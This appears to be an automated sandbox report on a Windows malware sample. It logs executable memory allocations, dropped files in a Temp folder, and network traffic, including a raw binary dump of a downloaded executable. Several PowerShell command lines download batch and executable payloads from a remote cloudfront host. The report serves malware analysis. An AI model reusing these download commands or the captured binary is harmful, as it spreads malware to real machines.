 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ae000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028af000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04940000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04941000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04942000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04943000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04944000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\i1.exe
file C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\lood.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
cmdline powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
cmdline powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
cmdline powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
file C:\Users\test22\AppData\Local\Temp\i1.exe
file C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\i1.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received W]f5BvC@®ž yÛR&rº,Pø—¾sDOWNGRD UšÚ»àÝ\ÇZ»ñî0¸…yíõ'V ½²y¡øÀ ÿ
Data received b
Data received 6`¨›^\€²/Yö‡ù%C†çiRšáqãØ- NoöÈIÙ¶óV®+¶tëÏû&㺖.j;X”‰GVÿ% “pSƒÚ„tÃgžh:ߎ@ZJNÏC‘;çVÖpËRî{}®:ç¼1ùEöÂ`ÏY+€Ì4G߹ސemÏ,‘¦¦çޅI|fN£:m©µî4.º ¸3ßGë±k%ٛ΁ÑEF2–p‡ÞIC…¶ls»dêaA¬ÉÔT߇/Ç"²&̟YThŸü¾*/ÄUu@`…U9‹£ð0í0Uÿ0ÿ0Uÿ†0Uœ_ߪ×0+8ˆ¢¸mJœò‘ƒ0U#0€¿_·ÑÎ݆ô[U¬Üשˆç0O+C0A0+0†http://o.ss2.us/0!+0†http://x.ss2.us/x.cer0&U00  †http://s.ss2.us/r.crl0U  00U 0  *†H†÷  ‚#ãŠWÊ}éyLñUýÌSn>GßÆUò²6í€SÄ]4(k¾ÇUügêË?²3ÍX‚øø/õ`ÔÎñÁݧu—O¹mÞ÷“‘º~@,íÁê»vž3w SÝd«‚'ñiÕM^®ô¡Ãu§XD-ò<p˜¬ºi¶•w1^,ü ‡:Giðy_ôT¤•^x`'ΟÂwÿ#Sw]ºÿêYçÛϯ’–ï$š5zœ‘Æ}™ö?ßõrTá©Y{ƒ¿R.FŒ²dvHÓØyènVÌ®,×8™äÊ [ÿ–°¨4IßV©÷°_í3íŒG·0]ôŒ
Data received K
Data received GAbHµõfs°øÈOђçÔè@ÇA†.åòÍmü Î ”øO(!PPÒZÉݞeËæ·Øã—U4S-됺®ÿ_p –s1¬]'„*´Làí8¿ øç“Ñّ@w.Ïû„K`ŒŒíšæ土EÑ/gI? ¬½½ÖÐ?fðŸ¢w·DåáÌÔGDè²ÜHGxý~x‚ô]{QăŽóo’ZI Gh¦Ptì…9ȚÚ9ïgsN뼘y çð·PB…£\(ÜÝ0ƒ/œ6ºí ~ã Í\Ssj ÃË,»¡S¯`£Œ2鱝úÏçÌh+`[Rý^[ìG½ÇÈtJ¤‹¨²SM¥b1dðU}g«–‘u®¤w™/ºêÀþÅ<±d»—‘&V¢ŒªØÐ0‹¤©ü¸ñX+:n¾ÕÈ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received vwŠÊêu;ӞóÈSÚ;AkTà¥&˜˜ &>…ÅS“{D^ߞZúžû»e
Data received  
Data received óY‚’WrŒ@Ùú̾,h§î–T·d¡ òÆ@­9¥3TÃGSM>ÍiÍã'×0ššJåöÁœV££êы®o+þ`oÕ^'ºÇÁu…ÙíIGm¹½ûyÁd`¦4Fˆ¯¿ã#íúã²Ò¾Hr. [´ÿ¥À¨Ž#'GÒú%™€“Up ǝ½OŠNT´è5ê»$gÃöÃK”`¶ãU؁¦YåÅbÀAê(:í'6F.ƒñY@s1XÒÒzP s^VsZ‰ÇÒ(”GˆqKö Àä¦×  }yãâô†­-|›'¿Â³sLjì)zNÉM›lÙç,‚š&Š ˜ê±Diӟ´ÎqW(S3ãÞ4ÌÂÆß7֎÷]‚š€à¦gxéߕ4-qÍÓdû);G§UÕÃÊbÆMŠË¸KY¼¸îÈlÿ2˜RØ(ÐrWìã4¹÷ü£„Q_œ«># n!’łý€~>w±JˆŠpl²ªêdM»~Ilão•5›Hivؼ-zà,Kx?+\»¤ 6¤ÈT6Ej §ä
Data received Wϕ»4ŽÃcxû=µ2£™o´¾Ñ|OÈDOWNGRD :Øø€JiòÆ7Àˆ•M9Ȑ/Þâg™FB Ý()xÜèÀ ÿ
Data received GAL à˜™Œ, jqª+í¢ÔÉk?› ø‰E¿Ê)(uÉbïô”–þÉ¿Tv^†vèG ºîê@S9aºƒzRéß1‡^,|›(“lWs.ŠÐRv RìÇó4‘ú2[?º 7Nza4¶þœNªóF€/í‚ß.Ö õµ½$\êZã× Ò&ËÉh^‹ƒ/oˆ¨ ÝÐäÉ8r Ãp— u(Àä¡-ˆ«à/Ö°y¥@"ãcÒœÐ¤EWãTƒºY:Md'§+ÊϗºÉ[èºÎvR¦ÕI=B¸]Üpb»,ÙQ/ít¿"¨zØH(»;šX@!`vr7h€Z$ôá>¢˜x܁{©šÖw6üíÃd¼:¹ó\ ù0ѨlÊۖÆÒÑ7xšŽH@ë-­ÉŸP^wÊ»ØÞ
Data received Wû!ªie4€¶w¹tA5°i /Œ '÷Å®|Ð6¤¥FMäŽ> @˜ÉixÈ©‰‰
Data received Ð
Data received : ö—Ç tOltJ?Ãí®%тûÚC`¤÷ÒÚ P¹0?M¶ ;k!Ú%žóуPêsãÈD‘‹æFTAIÔBmwZ: á¾¸ÜÓ·ã–kT{#å×ü,g;Kãî‰EƒEüHé̈SKÄ­ž„Í$$C|^ì‚–u…Zîùñ⼈<§’®ù@¿d*Ã5/@,œâ‡Ï6ëø\0A7\TS00ËgÛàñ¾i©øE‘ûú0„¶äà'WÓ}¤)·Bù¸;\Šz PÚi³]ÅÛÍ9·ãlœÝl›hhûp]R}üF]Œ;ðå#§ã&/ÜRÿ¾<ÞqBâÕNètˆ¹*%¤+¥ÄJ¼ÖÖ7½ðU‰eM¥7Aß°ˆíh‰WÝîœâg·¾À®©°¿Ž¦Á_ÇLù¶uó)s˜—ÝXPB†Ëå ù’0âÝÕ g±}¡¥Œ)@~❠nÈ£”›rI—IÓ;UÀ¸‚,r ëÉjàÞAÇÜ@†¡Î﮳ z–~rëO•(ÒæYE‹Xê ZŦDá4¨×»³+ªûµpnøÚ¬H?4bê]»ÞË´ËUbrè¥ê‰­íÃÛr¹“,
Data received HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 02:54:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 27 Apr 2024 02:45:01 GMT ETag: "6be01-6170b01c1a262" Accept-Ranges: bytes Content-Length: 441857 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÔKuº[Kuº[Kuº[F'e[Uuº[F'Z[Ãuº[F'[[duº[B )[Huº[Ku»[;uº[þë_[Juº[F'a[Juº[þëd[Juº[RichKuº[PEL|Pdà  zÄA0@ÀÅö€ô“(0Ä%k ÅT28Ȉ@0Œ.text“ `.rdataÎl0n@@.data(‰Â °Œ@À.rsrc%k0Äl<@@.relocT Å¨@B¹Lèuh‰(Aè_'YùTèÈh(AèI'Yù@èhu(Aè3'YÃj¹HèÃj¹<èÃj¹PèûÃj¹DèîÃÌÌÌÌÌÌÌÌÌÌU‹ìQQƒìòL$ò$èXÝ]øòEøƒÄ‹å]ÃU‹ìQQQQò$èø Ý]øòEøYY‹å]ÃU‹ìVE‹ñPèUÇ”QA‹Æ^]ÂÇ”QAé U‹ìV‹ñèêÿÿÿöEtVè¦(Y‹Æ^]ÂU‹ì‹E ]ÃU‹ì‹E€8u3À]ÃPè§!Y]ÃU‹ìƒ}u‹E]Ã]é`U‹ìƒ}u‹E]Ã]é U‹ì‹E Š‹Eˆ]ÃU‹ì‹E‰‹Á]ÂÇ”?A‹ÁÃÇ”?AÃU‹ì3À;M”À]ÂU‹ìV‹ñèßÿÿÿöEtVè(Y‹Æ^]‹ËAÃU‹ì‹E‰‹E ‰A‹Á]‹ËAÃU‹ìW‹ù‹MèîÿÿÿP‹Ïèæÿÿÿ‹Èè“ÿÿÿ„Àt‹MVèÏÿÿÿ‹Ï‹ðèÆÿÿÿ;Æ^u3À@ë3À_]ÂU‹ìQÿu ‹Mè’ÿÿÿ‹E]ÂU‹ìQQÿu ‹UøÿuRÿP ‹Èè‹ÿÿÿ‹å]ÂU‹ìV‹ñ‹MèXÿÿÿP‹Îèÿÿÿ^„Àt‹Mè@ÿÿÿ;E u3À@ë3À]ÂV‹ñèêþÿÿÇ°?A‹Æ^øü†AÃU‹ìQÿu ƒeüè Y…À¹‡AEÈQ‹Mè± ‹E‹å]ÂU‹ìV‹ñèöEtVèÏ&Y‹Æ^]Âé’þÿÿV‹ñèÿÿÿÇÌ?A‹Æ^ø‡AÃU‹ìQƒeüƒ} u‹Mh ‡AèQ ë ÿu ÿuèoÿÿÿ‹E‹å]ÂU‹ìV‹ñèöEtVèb&Y‹Æ^]ÂéŽÿÿÿV‹ñè"ÿÿÿÇè?A‹Æ^ø8‡AÃU‹ìQÿu ƒeüè_Y…À¹‡AEÈQ‹MèÛ‹E‹å]ÂU‹ìÿu è Y…Àtè>ëè=‹MPÿu èôýÿÿ‹E]ÂU‹ìV‹ñèöEtVèÊ%Y‹Æ^]Âéöþÿÿ¸Lø@Áá4ïÆÃ)ÃU‹ììP=0”SV‹ñW‰u܋‹~‰]èuj…°÷ÿÿPjÿP0A¡³AMðƒeð‰EࡳA‰EÐè¤ÿÿÿ‹Uð‹ ³AÂ?¡³Aj ‰Uð‰MԉEØ^ÇEäƒEä‹ÃÇEô@.ëíÁàÁ=0©‰Eü¡,DEôƒeô=0ë£,¡ DEô£ ‰Eô‹EèÁè‰Eø‹Mü3Û3Mô‹EøEØ3Á‰Mü‹ 0Ç(î
Data received PèZÿ6èȃ&Yë½3À@^[‹å]ÃU‹ìQEüPh°@Ajÿ´0A…ÀthÈ@Aÿuüÿl0A…ÀtÿuÿЋå]ÃU‹ìÿuèÁÿÿÿYÿuÿ°0AÌU‹ìèÑQÿuè&RYhÿè£ÌjjjèMƒÄ Ãjjjè>ƒÄ ÃU‹ìƒ=ø@Athø@AèöSY…Àt ÿuÿø@AYèÓThÌ1Ah°1AèÍYY…ÀuChҋ@èöøÿÿÇ$¬1AhŒ1Aèvƒ=)YYth)èSY…Àt jjjÿ)3À]ÃU‹ìjjÿuè§ƒÄ ]ÃVjÿ¤0A‹ðVèdGVè‹VèŸ:VèþTVèÚTVèWƒÄ^éýMU‹ì‹E SV‹u3Û+ƃÀÁè9u Wÿ÷×#øv‹…ÀtÿЃÆC;ßrð_^[]ÃU‹ìV‹u3Àë…Àu‹…ÉtÿуÆ;u rì^]ÃjèÊYÃjè+!YÃjh€Aè6!jè¬Yƒeüƒ=ŒNE„ÉÇ´NEŠE¢°NEƒ} …œÿ5)‹5¨0Aÿ֋؉]ԅÛttÿ5)ÿ֋ø‰]ä‰}à‰}܃ï‰}Ü;ûrWjÿ¤0A9tê;ûrGÿ7ÿ֋ðjÿ¤0A‰ÿÖÿ5)‹5¨0Aÿ։EØÿ5)ÿ֋MØ9Mäu9Eàt®‰Mä‹Ù‰]ԉEà‹øëœhè1AhØ1Aè»þÿÿYYhð1Ahì1AèªþÿÿYYÇEüþÿÿÿè ƒ}u)ÇŒNEjè Yÿuè\ýÿÿƒ}tjè YÃèY ÃU‹ìjjÿuèÂþÿÿƒÄ ]ÃU‹ìƒìë ÿuèZEY…ÀtÿuèÓ Y…Àtæ‹å]ÃjEüÇEü @APMðècéÿÿh¬AEðÇEð@APè‘Ìèýcéjh Aè˜èSK·ðjècY¸MZf9@t3Ûë3¡<@¸@PEuë¹ f9ˆ@uÝ3ۃ¸t@v 9˜è@•Ã‰]äèÙD…ÀujèÜYèŽ_…ÀujèËYèJƒeüèÒ4…Àyjè±YÿÀ0A£)èäc£ÀNEèá_…Àyjè)üÿÿYèÿa…Àyj èüÿÿYjèJüÿÿY…ÀtPèüÿÿYè2dVPjh@èTÖÿÿ‹ð‰u܅ÛuVè…þÿÿèüÿÿë.‹Mì‹‹‰EàQPè[YYËeè‹uà‰u܃}äuVèpüÿÿèÉûÿÿÇEüþÿÿÿ‹ÆèšÃU‹ìƒ=ÈXEuèfMÿuè»MhÿèeûÿÿYY]Ã; 8¥AuóÃé7dU‹ìƒì VWjY¾Ø@A}àó¥‹u ‹}…ötöt‹ƒéQ‹‹pÿP ‰}ø‰uü…öt ötÇEô@™EôPÿuðÿuäÿuàÿÄ0A_^‹å]ÂPdÿ5D$ +d$ SVW‰(‹è¡8¥A3ÅP‰eðÿuüÇEüÿÿÿÿEôd£ÃU‹ìVü‹u ‹N3ÎèFÿÿÿjVÿvÿv jÿuÿvÿuèqƒÄ ^]ÃU‹ìQSü‹E ‹H3M èÿÿÿ‹E‹@ƒàft‹E Ç@$3À@ëlëjj‹E ÿp‹E ÿp‹E ÿp jÿu‹E ÿpÿuèºpƒÄ ‹E ƒx$u ÿuÿu è-jjjjjEüPh#莃Ä‹Eü‹] ‹c‹k ÿà3À@[‹å]ÃU‹ìƒì¡8¥AMèƒeè3Á‹M‰Eð‹E ‰Eô‹E@ÇEì+C@‰Mø‰Eüd¡‰EèEèd£ÿuQÿuè†c‹È‹Eèd£‹Á‹å]ÃXY‡$ÿàXY‡$ÿàXY‡$ÿàU‹ìƒì8S}#u¸E@‹M ‰3À@鰃eÈÇEÌ\C@¡8¥AMÈ3Á‰EЋE‰EԋE ‰E؋E‰E܋E ‰Eàƒeäƒeèƒeì‰eä‰mèd¡‰EȍEÈd£ÇEü‹E‰Eð‹E‰EôèÜZ‹€€‰EøEðP‹Eÿ0ÿUøYYƒeüƒ}ìtd‹‹‹]ȉd‰ë ‹EÈd£‹Eü[‹å]ÃU‹ìQQ‹ES‹] V‹p ‹H‰Mø‰uüW‹þ…Ûx3‹Uƒþÿu èÜM‹Mø‹UNkÆ9T};T~ƒþÿu‹}üK‰uü…ÛyЋEF‰0‹E‰8‹E;x w;÷vèšM‹MøkÆ_^[Á‹å]ÃU‹ìQS‹E ƒÀ ‰Eüd‹‹d£‹E‹] ‹mü‹cüÿà[‹å]ÂU‹ìQQSVWd‹5‰uøÇEü!F@jÿu ÿuüÿuÿÈ0A‹E ‹@ƒàý‹M ‰Ad‹=‹]ø‰;d‰_^[‹å]ÂU‹ì‹M V‹u‰è}Y‹ˆ˜‰NèoY‰°˜‹Æ^]ÃU‹ìVè[Y‹u;°˜uèKY‹N‰ˆ˜^]Ãè:Y‹ˆ˜ë ‹A;ðt‹Èƒyuñ^]é’L‹F‰AëÒU‹ìè Y‹€˜…Àt‹M9t ‹@…Àuõ3À@]Ã3À]ÃU‹ìƒìSVWü‰Eü3ÀPPPÿuüÿuÿuÿu ÿuèXmƒÄ ‰Eø_^[‹Eø‹å]ÃU‹ìèƒ}tèyÛâ]øµµ@ÇئA¡¾@£Ô¦AÇܦA2¿@Çà¦AŒ¿@Çä¦AÀ@£è¦AÇì¦AÖµ@Çð¦AJ¿@Çô¦A²¾@Çø¦A¿@ÃU‹ìƒ%ÌNEƒìS3ÛC  Aj ènà…À
Data received B3ÉëFA€>\tù€>"u3öÁuƒ}t F€8"u‹ðë 3À3Ò9E”À‰EÑéë I…ÿtÆ\Gÿ…ÉuñŠ„ÀtA9Mu< t8< t4…Òt*¾ÀPè AY…ÿt…ÀtŠˆGFÿŠˆGë…ÀtFÿÿFéoÿÿÿ…ÿtÆGÿé-ÿÿÿ‹U _^[…Òtƒ"‹Eÿ]Ã= )uè'òÿÿV‹5ÀNEW3ÿ…öuƒÈÿé–<=tGVèˎÿÿFYðŠ„ÀuëGjP軾ÿÿ‹ø‰=œNEYY…ÿtʋ5ÀNES€>t>V薎ÿÿ€>=YXt"jS芾ÿÿ‰YY…Àt@VSPèتÿÿƒÄ …ÀuHƒÇó€>uȋ5ÀNEVèñ©ÿÿƒ%ÀNEƒ'3ÀÇ$)Y[_^Ãÿ5œNEèË©ÿÿƒ%œNEƒÈÿëä3ÀPPPPPè©ÿÿÌU‹ì‹E£XQE]ÃU‹ì‹E…Àx!ƒø~ ƒøu‹ ÈXEë ‹ ÈXE£ÈXE‹Á]Ãè!©ÿÿÇ觨ÿÿƒÈÿ]ÃU‹ìƒìƒeôƒeø¡8¥AVW¿Næ@»¾ÿÿ;Çt …Æt ÷У<¥AëfEôPÿX1A‹Eø3Eô‰EüÿH1A1EüÿT1A1EüEìPÿP1A‹MðEü3Mì3Mü3È;Ïu¹Oæ@»ë…Îu ‹Á GÁà ȉ 8¥A÷щ <¥A_^‹å]ÃU‹ìQWÿ\1A‹ø3À…ÿtuV‹÷f9tƒÆf9uøƒÆf9uðSPPP+÷PÑþFVWPPÿ¼0A‰Eü…Àt7Pè1½ÿÿ‹ØY…Ût*3ÀPPÿuüSVWPPÿ¼0A…Àu SèZ¨ÿÿY3ÛWÿ`1A‹Ãë Wÿ`1A3À[^_‹å]ÃVW3ÿ9= )uèÍïÿÿ‹5)…öu¾€QAŠ€ù w„Ét/…ÿt%€ù"u 3À…ÿ”À‹ø¶ÁPè#>Y…ÀtFFëÑ< wFŠ„Àuõ_‹Æ^ÃU‹ìÿÐ0Aj£ì[Eè²ÿuèéÿÿƒ=ì[EYYujè˜Yh ÀèâèÿÿY]ÃU‹ìì$jèO…ÀtjYÍ)£ÐYE‰ ÌYE‰ÈYE‰ÄYE‰5ÀYE‰=¼YEfŒèYEfŒ ÜYEfŒ¸YEfŒ´YEfŒ%°YEfŒ-¬YEœàYE‹E£ÔYE‹E£ØYEE£äYE‹…ÜüÿÿÇ YE¡ØYE£ÜXEÇÐXE ÀÇÔXEÇàXEjXkÀǀäXEjXkÀ‹ 8¥A‰LøjXÁà‹ <¥A‰Løh„QAèÌþÿÿ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒìSQ‹E ƒÀ ‰Eü‹EUÿu‹M‹müèù.VWÿÐ_^‹Ý]‹MU‹ëùu¹Qè×.]Y[É jh@’A舸ÿÿ‹E…Àtr8csmàujƒ
Data received xudx “tx!“t x"“uI‹H…ÉtB‹Q…Òt'ƒeüRÿpèè›ÿÿÇEüþÿÿÿë%3À8E •ÀËeèèûêÿÿöt‹@‹…Ét‹QÿPèO¸ÿÿÃU‹ìVÿu‹ñ赁ÿÿÇ”QA‹Æ^]Âj0hø‘Aèâ·ÿÿ‹E‰Eä3ۉ]ȋ} ‹Gü‰E؋uÿvEÀPè[ÿÿYY‰EÔèßöÿÿ‹€ˆ‰EÐèÑöÿÿ‹€Œ‰EÌèÃöÿÿ‰°ˆè¸öÿÿ‹M‰ˆŒ‰]ü3À@‰E‰Eüÿu ÿuÿuÿuW貚ÿÿƒÄ‰Eä‰]üé‘ÿuìèäYËeèèqöÿÿ3ۉ˜¬‹U‹} z€¾Gë‹G‰Eà‹r‹Ë‰MÜ9J v:kù‰};D7‹} ~"‹};D7‹} kÁ‹D0@‰Eà‹J‹Á‰Eàë A‰MÜ;J rÆPRSWè¸ ƒÄ‰]ä‰]ü‹uÇEüþÿÿÿÇEè‹Çèó¶ÿÿË} ‹u‹E؉GüÿuÔè_œÿÿYè½õÿÿ‹MЉˆˆè¯õÿÿ‹M̉ˆŒ>csmàuHƒ~uB~ “t~!“t ~"“u'‹}äƒ}Èu!…ÿtÿvèTœÿÿY…ÀtÿuVèœýÿÿYYë‹}äÃj¸Z(Aèa˜ÿÿèAõÿÿƒ¸”tè©èÿÿƒeüè éÿÿè%õÿÿ‹Mjj‰ˆ”è˗ÿÿÌU‹ìƒ} W‹} tÿu ÿuWÿuèƒÄƒ},ÿuuWëÿu,èüšÿÿV‹u$ÿ6ÿuÿuW臋F@hÿu(‰G‹Eÿp ÿuÿuWÿuè‘ýÿÿƒÄ,^…ÀtWP腚ÿÿ_]ÃU‹ì‹E‹8csmàu9ƒxu3x “tx!“t x"“uƒxuè[ôÿÿ3ÉA‰ˆ¬‹Á]Ã3À]ÃU‹ìƒì<‹E SVW‹}3ۈ]܈]ÿ€¾@ë‹@‰Eøƒøÿ|;G|è…çÿÿ‹u>csmà…ºƒ~… ~ “t~!“t ~"“…î9^…åèÉóÿÿ9˜ˆ„°è¸óÿÿ‹°ˆè­óÿÿjVÆEÜ‹€Œ‰Eèy8YY…Àuèçÿÿ>csmàu+ƒ~u%~ “t~!“t ~"“u 9^uèÐæÿÿèUóÿÿ9˜”tlèHóÿÿ‹€”‰Eìè:óÿÿÿuìV‰˜”èšYY„ÀuD‹}ì9Ž‹Ã‰]‹Oh>E‹LèûŽÿÿ„À…û‹ECƒÀ‰E;|Ùéã‹E‰Eë‹E>csmà…ƒ~……~ “t~!“t ~"“…f9_ †òEØPEðPÿuøÿu Wèù—
Data received ÿÿ‹MðƒÄ;M؃ύP‹Eø‰UìZð‰]ԋ] 9BðŸ;Bô–‹:‰}ô‹zü…ÿ‰}à‹}Ž€‹Mô‹F‹@ P‹ë#ÿv‹PQ‰EÐè˜ƒÄ …Àu*‹Eè‹UäH‹MôƒÂ‰Eè‰Uä…ÀӋEàƒÁH‰Mô‰Eà…Àµë'ÿuÜÆEÿÿu$ÿu ÿuÔÿuÐÿuôWÿuÿuSVè½üÿÿƒÄ,‹Uì‹Eø‹MðAƒÂ‰Mð‰Uì;MØ‚<ÿÿÿ3ۀ}t jVèâùÿÿYY€}ÿuy‹%ÿÿÿ=!“rkƒteÿwVèêYY„ÀuVèpñÿÿèkñÿÿèfñÿÿ‰°ˆè[ñÿÿƒ}$‹MV‰ˆŒu|ÿu ëz‹E9_ v8]u3ÿu$ÿu ÿuøWÿuPÿu VèuƒÄ èñÿÿ9˜”tèƒäÿÿ_^[‹å]Ãè¯äÿÿjVè;ùÿÿYYEÇEœQAPMÄè4{ÿÿhԒAEÄÇEĔQAP臓ÿÿÿu$èä–ÿÿjÿWÿuÿu èsƒÄÿwè\ûÿÿÌU‹ìQQW‹}?€„SVè‘ðÿÿ‹]ƒ¸€tHjÿ¤0A‹ðèvðÿÿ9°€t1?MOCàt)?RCCàt!ÿu$ÿu Sÿuÿuÿu WèޔÿÿƒÄ…À…¥ƒ{ uè¨ãÿÿEüPEøPÿuÿu S苕ÿÿ‹MøƒÄ‹Uü;Êsyp ‹E;Fô|c;Fø^‹‹~Áà‹|ô…ÿt‹V‹\ô‹Uü€{‹]u8‹~ƒÇðNj}ö@u(jÿu$Nôÿu QjPSÿuÿuÿu Wèúÿÿ‹UüƒÄ,‹Mø‹EAƒÆ‰Mø;Êr^[_‹å]ÃU‹ìQQSV‹u W…ötn3ۋû9~]‹Ë‰] ‹E‹@‹@ P‹‰Uø‰Eü…À~5‹Eÿp‹Fÿ2ÁP辋M ƒÄ …Àu‹Eü‹UøHƒÂ‰Eü‰Uø…ÀÏë³GƒÁ‰M ;>|¨_^ŠÃ[‹å]Ãè…âÿÿè¸âÿÿÌU‹ì‹M ‹UV‹‹q…öx ‹I‹‹ ÎÁ^]Ãjh ’A讯ÿÿ‹U‹M ÷€t‹ùëy zƒeü‹uVRQ‹]SèWƒÄHtHu4jFPÿsèÿÿÿYYPÿvWè“ÿÿëFPÿsèsÿÿÿYYPÿvWèø’ÿÿÇEüþÿÿÿè¯ÿÿÃ3À@ËeèèâÿÿÌj h¸’Aè ¯ÿÿ3ۋE‹H…É„ž8Y„•‹P…Òu ÷€„‚‹‹} …ÉxƒÇ ú‰]ü‹u„ÉyOötJ¡ð[E…ÀtAÿЉEjPèÌ2YY…À„)jWèÉ2YY…À„‹M‰FPQè·þÿÿYY‰éj‹EÿpöÁt)è†2YY…À„ãjWèƒ2YY…À„Ñ‹E‹HëµötQèX
Data received 2YY…À„µjWèU2YY…À„£ÿv‹EÿpWèÒxÿÿƒÄ ƒ~…Œƒ?„ƒFPÿ7éfÿÿÿ9^u9è2YY…ÀtcjWè2YY…ÀtUÿvFP‹EÿpèòýÿÿYYPWèxxÿÿƒÄ ë:èÉ1YY…Àt*jWèÊ1YY…Àtÿvèž1Y…Àtöj[•ÃC‰]äëè)àÿÿÇEüþÿÿÿ‹Ãë3À@ËeèèJàÿÿ3Àè°­ÿÿÃU‹ì‹E‹8RCCàt!8MOCàt8csmàu*èoìÿÿƒ éàÿÿè^ìÿÿƒ¸~ èPìÿÿÿˆ3À]ÃjhБAè­ÿÿ‹Ex€‹E¾pë‹p‰uäèìÿÿÿ€ƒeü;ut_ƒþÿ~‹E;p|èoßÿÿ‹M‹A‹ð‰UàÇEüƒ|ðt'‹E‰PhP‹Aÿtðè½óÿÿë ÿuìè)ÿÿÿYËeèƒeü‹uà‰uäëœÇEüþÿÿÿè;utè ßÿÿ‹E‰p覬ÿÿËuäè‚ëÿÿƒ¸~ ètëÿÿÿˆÃU‹ìSVWèbëÿÿ‹M3ö‹U»csmà¿"“9°¬u!9t:&€t‹%ÿÿÿ;Çr öA …“öBft!9q„„9uujÿQÿuÿu è¿þÿÿƒÄël9q u‹%ÿÿÿ=!“rY9qtT9u4ƒzr.9zv)‹B‹p…öt‹E$¶ÀPÿu ÿuQÿuÿuÿu RÿÖƒÄ ëÿu ÿuÿu$Qÿuÿuÿu RèMöÿÿƒÄ 3À@_^[]ÃU‹ìV‹uW‹F…ÀtQH€9tIö€‹} töu<‹W;ÂtBPQèÓÿÿYY…Àt3Àë$ötötò‹EötötåötötÛ3À@_^]ÃU‹ìjÿuÿuÿuÿuÿu ÿuèƒÄ]ÃU‹ì‹Eƒøet_ƒøEtZƒøfuÿu ÿuÿuÿu ÿuèâƒÄ]ÃøatƒøAtÿu ÿuÿuÿuÿu ÿuè}ë0ÿu ÿuÿuÿuÿu ÿuèëÿu ÿuÿuÿuÿu ÿuèЃÄ]ÃU‹ìƒì,SVWj0Xÿu‹ÈÇEøÿ‰Mü3ۍMÔè®ÿÿ‹}…ÿy‹û‹u …öt‹M…Éu èx—ÿÿjëG ˆ;Èwèf—ÿÿj"_‰8èí–ÿÿéä‹U‹‹Z‰Eì‹ÃÁè%ÿ=ÿuy3À;ÀuuƒÈÿ;ÈtAþjWP^SRèÀ‹øƒÄ…ÿtÆ陀;-uÆ-F‹}…ÿj0Xˆ”ÀþÈ$àxˆFFjePè/YY…Àt…ÿ”Áþɀáà€ÁpˆÆ@3ÿéO3Àã€ ÃtÆ-Fƒ}‹]j0Xˆ”ÀþÈ$àx÷ۈF‹JۃãàáðƒÃ'3À Á‰]ðu'j0XˆFƒÆ‹B‹ %ÿÿ Èu3À‰EøëÇEøþëÆF1ƒÆ‹ÎF‰Mô…ÿuÆë‹Eԋ€„‹Šˆ‹B%ÿÿ‰Eèw ƒ:†Âƒe¹‹Eü‰M …ÿ~S‹‹R#E#ыMüâÿÿ¿ÉèÉ2j0YfÁ·Àƒø9vËM ‹UˆF‹E¬È‰E‹EüÁéƒèO‰M ‰Eüf…Ày©f…ÀxW‹‹R#E#ыMüâÿÿ¿Éèq2fƒøv6j0Fÿ[Š€ùft€ùFuˆHëï‹]ð;EôtŠ€ù9u€Ã:ˆë þÁˆëþ@ÿ…ÿ~Wj0XPVè– ƒÄ 